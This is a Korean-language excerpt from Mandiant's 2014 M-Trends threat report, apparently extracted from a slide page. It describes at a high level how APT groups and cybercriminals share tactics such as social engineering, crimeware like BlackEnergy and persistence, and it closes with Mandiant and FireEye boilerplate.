  23. 23. www.mandiant.com 21 12 https://www.fireeye.com/blog/threat-research/2014/04/crimeware-or-apt-malwares-fifty-shades-of-grey.html 13 또한 APT18은 중국 기반의 위협 그룹이기도 합니다. https://www2.fireeye.com/WBNR-14Q3HealthcareWebinar.html을 참조하십시오 전술 중복 사용의 예 사회 공학 사회 공학은 APT 그룹만이 사용하지는 않습니다. 저희는 금년에 금융 위협 그룹이 초기 감염 경로로, 그리고 피해자에 특정한 피싱을 사용하여 복구 후 피해자에 대한 접속을 재개하기 위한 반복적인 시도에서 스피어 피싱을 사용하는 것을 관찰했습니다. 또한 인터렉티브 사회 공학은 두 종류의 위협 범죄자들이 사용한 전술입니다. 한 공격에서, 금전적 동기가 있는 범죄자들은 인기있는 플랫폼에서 소셜 미디어 프로파일을 작성했고, 회사 직원들에게 접근하여 백도어를 다운로드하도록 시도했습니다. 한편, 국가가 후원한다고 의심되는 범죄자인 APT3 는 위조 여성 페르소나를 작성하여 인기있는 소셜 네트워크를 통해서 한 회사 직원과 접촉했습니다. 메시지를 주고 받은 지 3주 후에, "그녀"는 그 직원의 개인 이메일 주소로 "이력서"를 보냈고, 그 이력서는 APT3의 백도어들 중 하나를 사용하여 무기화되었습니다. 또한 "그녀"는 다른 직원들에게 조사를 위한 질문(IT 관리자의 이름, 그들이 실행한 소프트웨어 버전 포함)을 했습니다. 맞춤형 악성코드 및 툴 APT 범죄자와 금융 범죄자들은 맞춤형 툴을 작성한 것으로 알려졌습니다. 어떤 경우에, 사이버 범죄자들은 피해자의 환경에 잠복해 있던 몇 년 동안에 작성한 60여 개의 악성코드 및 유틸리티 변종을 설치했습니다. 한편, 러시아 기반의 APT 그룹인 APT28은 7년여의 기간 동안 악성코드를 체계적으로 발전시켰고, 특정한 환경에 잠복해 있는 동안 유연성을 제공하는 플랫폼을 작성했습니다. 크라임웨어 크라임웨어에는 공개적으로 제공되는 툴킷과 이익을 얻기 위해 판매하는 툴킷이 포함됩니다. 이것은 금전적 동기가 있는 사이버 범죄자들만이 사용하는 것은 아닙니다. 러시아에 소재한다고 의심되는 한 APT 그룹은 제로데이 익스플로잇을 사용하여 블랙에너지(사이버 범죄자들이 수년 간 광범위하게 사용한 툴킷)의 변종을 설치했습니다. 많은 원격 접속 툴은 APT 범죄자와 사이버 범죄자들이 모두 자주 사용했습니다.12 크라임웨어는 다양한 종류의 공격에 대한 책임을 물을 때, 툴 자체는 유일한 결정적인 요인이 될 수 없다는 것을 상기시키는 역할을 합니다. 지속성 유지 사이버 현금을 강탈하는 것은 더 이상 진열장을 깨고 물건을 탈취하는 범죄자들에 의해 지배되지 않습니다. 지속성을 유지하는 것은 오랫동안 임무를 완수할 때까지 환경에 잠복해 있는 APT 범죄자의 특징이었습니다. 그러나 금융 범죄자들은 주목을 받지 않고 은닉 상태를 유지하는 능력을 점점 더 많이 보유하게 되었습니다. 어떤 경우에, 사이버 범죄자들은 잘 알려진 스타트업 레지스트리 위치를 사용하여 지속적인 잠복을 유지한 후에 악성코드를 전파하기 시작했습니다. 다른 경우에는 금융 위협 범죄자들이 5년여 동안 환경에 대한 접속을 유지할 수 있었습니다. 저희는 탐지된 후에 환경으로 재침입하려고 시도하는 금융 위협 범죄자들의 지속성을 관찰했습니다. 데이터 도난의 범위 데이터 도난은 더 광범위한 규모로, 그리고 대량의 데이터로부터 발생하고 있습니다. 공격자들은 계속 개인 신원 확인 정보(PII: Personal Indentifiable Information)를 저장하는 대규모의 리포지터리를 추적 및 입수했습니다. 역사적으로, 금융 위협 범죄자들은 사기를 치거나 지하 시장에서 데이터를 재판매하기 위해 PII를 훔쳤습니다. 그러나 PII에 관심이 있는 다수의 공격자들은 자체적인 목표가 있고, 금전적 이익과 전적으로 무관한 APT 범죄자들을 포함시켜 범위를 확대했습니다. 이제, 저희는 보통 APT의 목표가 아닌 PII도 훔치는 APT18과 같은 APT 그룹이 있다는 것을 밝혀내었습니다.13 그림 10: APT 그룹과 사이버 범죄자의 전술이 중복되는 방법
  24. 24. 22 www.mandiant.com 최일선에서 본 관점M-Trends 이 그룹은 APT28과 동일한 종류의 피해자를 표적으로 삼는 것처럼 보였으나, 몇 가지 주요한 차이점이 있었습니다. 한 가지 예를 들면, 이 그룹은 제로데이 익스플로잇과 범죄 툴을 사용했습니다. 그리고 미국의 중요한 기반시설을 표적으로 삼았을 수도 있습니다.14, 15 공격에 사용된 악성코드와 인프라에 대한 분석에 근거할 때, 샌드웜 팀은 블랙에너지 툴킷16 을 사용하여 우크라이나의 피해자들을 표적으로 삼았고, 이것은 우크라이나와 러시아의 지속적인 긴장 상태를 반영했습니다. 또한 이 그룹은 산업 및 중요 기반시설 환경에서 광범위하게 사용되는 감시 제어 데이터 수집(SCADA) 설비를 표적으로 삼기 위해 블랙에너지 툴킷을 설치한 것으로 알려졌습니다.17 이 표적이 된 시스템은 다양한 산업에서 사용되는 생산 툴로서, 민감한 금융 정보나 지적 재산을 보유 또는 전송하는 벤더가 소유한 프로토타입이나 네트워크가 아니었습니다. 이러한 표적이 된 시스템의 성격을 고려할 때, 공격자들은 파괴적인 공격을 위해 취약점을 정찰했을 수도 있습니다. 이러한 공격에서 블랙에너지와 같은 크라임웨어 툴킷을 사용하면 공격자들는 어느 정도의 익명성과 부인할 수 있는 능력을 갖출수도 있습니다. 이러한 차이점이 중요합니까? 보안 커뮤니티에서, 공격자의 동기를 파악하고 공격을 특정한 위협 범죄자의 책임으로 돌리는 것의 가치는 종종 토의의 대상이 됩니다. 어떤 사람들은 네트워크 방어의 관점에서 누가 시스템을 침해했는지는 중요하지 않고, 단지 공격을 중지시키고 피해를 복구해야 한다고 주장합니다. 이와 동시에, 사이버 범죄와 APT 툴 및 전술 사이의 경계가 더 불명확해짐에 따라 범죄자의 의도와 잠재적 악영향에 대한 질문들에 답변하기가 더욱 어려워집니다. 공격자들의 부인 및 속임수, 공정하지 않은 법 집행, 그리고 부패한 정부 기관과 범죄 지하 조직 사이의 복잡한 유대 관계의 탓이라고 답변하십시오. 이러한 모호한 상황에서, 공격자의 의도와 동기를 밝히면 조직의 대응을 올바른 방향으로 유도할 수 있습니다. 유용한 사례: 정부의 후원을 받아 인텔리전스를 수집하는 러시아 기반의 위협 그룹은 중요한 미국 기반시설의 구성 요소에 대한 원격 접속을 제공하는 크라임웨어 툴을 설치하고 있습니다. 이 그룹은 일반적인 크라임웨어를 사용하여 공격하는 경우도 있으나, 이러한 공격을 지극히 평범한 사이버 범죄로 취급하는 것은 잘못된 생각입니다. 네트워크에 잠복해 있는 악성코드가 국가가 후원하는 공격에 사용할 수 있는 감염 경로인지, 그리고 사소한 위협으로부터 발생하는 부수적 감염인지 여부에 대한 판단에 따라 여러분의 반응과 대응이 바뀔 것입니다. 이와 마찬가지로, 사이버 범죄자의 수중에 있는 도난된 개인 데이터는 국가가 후원하는 위협 그룹의 수중에 있는 다른 확실치 않은 용도로 사용되는 데이터에 비해 다른 대응이 필요하고, 즉각적인 영향을 받을 수 있습니다. 14 http://blog.trendmicro.com/trendlabs-security-intelligence/sandworm-to-blacken-the-scada-connection/ 15 https://www.virusbtn.com/conference/vb2014/abstracts/LM3-LipovskyCherepanov.xml 16 블랙에너지는 위협 범죄자가 동적 링크 라이브러리(DLL) 컬렉션을 통해서 새로운 특성과 기능을 추가할 수 확장 가능한 프레임워크를 제공합니다. 각 DLL 플러그인은 특정한 기능을 염두에 두고 쓸 수 있고, 암호화된 파일에 저장됩니다. 이러한 플러그인들은 표면적으로 모두 동일한 것처럼 보이므로, 위협 범죄자들의 궁극적인 의도를 파악하는 것을 더 어렵게 만듭니다. 블랙에너지는 사이버 범죄자들에게 인기가 있었고, 배포된 서비스 거부(DDoS) 공격에 사용되었습니다. (http://atlas-public.ec2.arbor.net/docs/ BlackEnergy+DDoS+Bot+Analysis.pdf; http://blogs.mcafee.com/business/security-connected/evolving-ddos-botnets-1-blackenergy를 참조하십시오) 17 http://blog.trendmicro.com/trendlabs-security-intelligence/sandworm-to-blacken-the-scada-connection/ 교훈 사이버 범죄자와 APT 범죄자의 툴, 기법, 절차가 합쳐짐으로써, 조직들은 범죄자의 의도와 동기를 면밀히 조사해야 합니다. 그 후에 보안 사고의 잠재적 피해를 평가하고, 적절히 대응하고, 조직이 직면하고 있는 위협에 적절한 보안 전략을 수립할 수 있습니다.
  25. 25. www.mandiant.com 23 사이버 보안은 대세가 되었으므로, 조직들은 데이터 침해를 새로운 관점(두려움과 수치심의 원천이 아닌 비즈니스 현실)에서 고려해야 합니다. 조직들은 보안 사고를 예측하고 자신감 있게 대처해야 합니다. 따라서, 사이버 보안에 대한 새로운 접근방법을 사이버 보안 아무도 모든 침해를 방어할 수는 없습니다. 그러나 가장 지능적인 위협을 신속하고 효과적으로 방어, 탐지, 분석, 대응함으로써, 헤드라인을 장식하는 중대한 침해로부터 조직, 고객, 파트너들을 보호할 수 있습니다. 어떤 보안도 완벽하지는 않습니다. 아무도 새로운 모든 침입 기법을 예측할 수 없습니다. 그리고 저희가 2014년에 계속 관찰한 것에서 알 수 있듯이, 어떤 위협 그룹도 새로운 보안 툴에 의해 방어된다고 해서 활동을 중지하지는 않을 것입니다. 조직들은 기술, 인텔리전스, 전문성을 적절히 통합하면 여전히 보안 결함을 보완할 수 있습니다. 조직들은 새로운 위협, 새로운 툴, 네트워크를 침해하기 위한 정교한 새로운 방법보다 앞서가면서 적응할 수 있습니다. 사이버 범죄자들은 능력이 있고, 좋은 툴을 갖추고 있고, 단호합니다. 그러나 조직들도 그들을 따라잡지 못할 이유가 없습니다. 맺음말 공격자들은 계속 발전했고, 그들의 표적은 계속 확장되었으며, 그들의 기법은 계속 변화했습니다. 그러나 중심적인 요인에는 변함이 없습니다. 너무 많은 조직들이 피할 수 없는 침해에 대비하지 않았기 때문에, 공격자가 침해된 환경에 매우 오래 잠복할 수 있었습니다.
  26. 26. 24 www.mandiant.com 최일선에서 본 관점M-Trends Mandiant 소개 FireEye 계열사인 Mandiant는 모든 주요 산업에 속한 수백 개 고객들의 컴퓨터 네트워크와 사용자 단말로부터 위협 범죄자들을 퇴치했습니다. 저희는 모든 종류의 중대한 보안 사건을 방어 및 대응하기를 원하는 포춘 500대 기업과 정부 기관들이 정보와 조언을 얻기 위해 찾는 조직입니다. 침입이 이뤄졌을 때, Mandiant의 보안 컨설팅 서비스는 FireEye의 위협 인텔리전스와 기술의 뒷받침을 받아 조직들이 침해에 대응하고 네트워크 보안을 재구축하는 것을 지원합니다. FireEye 소개 FireEye는 공격자들이 표적으로 삼는 전세계에서 가장 귀중한 자산을 보호합니다. 저희는 기술, 인텔리전스, 전문성을 통합하고, 가장 적극적인 사고 대응팀을 보강하여, 보안 침해로 인한 피해를 방지합니다. 저희는 침해의 모든 단계에서 공격자들을 탐지 및 방어합니다. FireEye 제품을 사용하면 공격이 발생하는 즉시 탐지할 수 있습니다. 또한 이러한 공격이 고객의 가장 귀중한 자산에 대해 일으키는 위험을 이해할 수 있습니다. 그리고 사고를 신속하게 억제 및 해결하는 툴과 지원을 제공받습니다. FireEye 글로벌 방어 커뮤니티에는 67개국에서 2,700여 고객들이 가입되어 있고, 포춘 500대 기업 중 157개가 넘는 기업들이 포함되어 있습니다.
  27. 27. Mandiant, a FireEye Company  |  02 559 0730  |  korea.info@FireEye.com  |  www.mandiant.com  |  www.fireeye.kr © 2014 FireEye, Inc. 저작권 소유. FireEye는 FireEye, Inc의 등록상표입니다. 다른 모든 브랜드, 제품 또는 서비스 명칭은 각 소유자의 상표 또는 서비스 마크입니다. RPT.MTRENDS.EN-US.022415 A FireEye® Company

×